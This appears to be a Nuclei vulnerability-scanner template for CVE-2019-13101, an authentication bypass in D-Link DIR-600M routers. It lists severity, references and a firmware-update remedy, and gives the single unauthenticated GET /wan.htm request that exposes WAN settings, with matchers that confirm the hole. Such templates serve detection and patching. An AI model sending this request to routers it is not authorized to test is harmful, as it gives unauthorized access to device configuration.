id: CVE-2019-13101 info: name: D-Link DIR-600M - Authentication Bypass author: Suman_Kar severity: critical description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page. remediation: | Update the router's firmware to the latest version provided by D-Link. reference: - https://github.com/d0x0/D-Link-DIR-600M - https://www.exploit-db.com/exploits/47250 - https://nvd.nist.gov/vuln/detail/CVE-2019-13101 - https://us.dlink.com/en/security-advisory - http://packetstormsecurity.com/files/153994/D-Link-DIR-600M-Wireless-N-150-Home-Router-Access-Bypass.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-13101 cwe-id: CWE-306 epss-score: 0.03717 epss-percentile: 0.9073 cpe: cpe:2.3:o:dlink:dir-600m_firmware:3.02:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dlink product: dir-600m_firmware tags: packetstorm,edb,cve,cve2019,dlink,router,iot http: - raw: - | GET /wan.htm HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} matchers-condition: and matchers: - type: word part: body words: - "/PPPoE/" - type: status status: - 200 # digest: 4a0a00473045022100f3d3824a34c6e5db4d403076d557915fb8527405ea6174804c27c91bbe7d63c7022062dcee4f6e5e590e4d4296d12a606227aa0127215efad508fc3c4c4f535d0f65:922c64590222798bb761d5b6d8e72950